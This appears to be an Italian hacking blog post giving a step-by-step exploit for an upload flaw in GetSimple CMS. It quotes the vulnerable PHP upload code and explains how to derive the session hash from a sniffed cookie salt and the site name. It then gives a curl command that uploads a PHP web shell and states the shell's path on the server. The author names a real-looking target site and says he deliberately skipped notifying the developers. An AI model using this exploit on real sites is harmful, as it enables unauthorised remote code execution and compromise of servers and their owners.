if ($_REQUEST[‘sessionHash’] === $SESSIONHASH) {
if (!empty($_FILES))
{
$tempFile = $_FILES[‘Filedata’][‘tmp_name’];
$name = clean_img_name($_FILES[‘Filedata’][‘name’]);
$targetPath = GSDATAUPLOADPATH;
$targetFile = str_replace(‘//’,’/’,$targetPath) . $name;
move_uploaded_file($tempFile, $targetFile);
….

Tradotto per i comuni mortali è: Se l HASH è quello UPLOADA il FILE.
MINCHIA, cazzuti.
Come lo troviamo l’ HASH? Internamente ai SOURCES ovviamente in questo modo:

$SESSIONHASH = md5( $salt. $sitename) // ovvero l’ MD5 del salt nel COOKIE + NOME del SITO.

Example site: http://kittyears.net/admin/logout.php Facciamo una richiesta alla pagina logout.php del CMS.

Prendiamo il SALT del cookie SNIFFATO che è : cocor*vwl^kif8z531hd4u4gcukk2pok7vul
//Ovvero la parte del cookie dopo la versione del CMS (203)

Creiamo l’ HASH MD5 col nome del sito a cui inviare la RICHIESTa di UPLOAD :

Ora che abbiamo TUTTO facciamo una semplice richiesta all URL con CURL in questo modo:

curl -F “Filedata=@shell.txt;filename=shell.php” http://sitoBUGGOSO/admin/upload-ajax.php\?sessionHash\=HASH CREATO

Se tutto è andato per il verso giusto avrete la vostra shellina SHELL.PHP nella PATH di UPLOADS del CMS, ovvero

define(‘GSDATAUPLOADPATH’, get_root_path(). ‘data/uploads/‘);

/getsimpleCMS/data/uploads/shell.php

p.s: Buon FERRAGOSTO a TUTTI e non fate DANNI. E un ringraziamento al migliore di tutti: CHUZZ sul canale IRC #hackerjournal (irc.azzurra.org) !!!!

p.p.s. Per le versioni precedenti alla 2.03, nel caso il cookie non abbia niente dopo la versione del CMS, non serve neanche il salt. Ma provate da soli.

p.p.p.s Non avverto gli SVILUPPATORI perchè non me ne frega un CAZZO dell’ etica. Tu hai la tua, io la MIA, voi la vostra, ESSI la LORO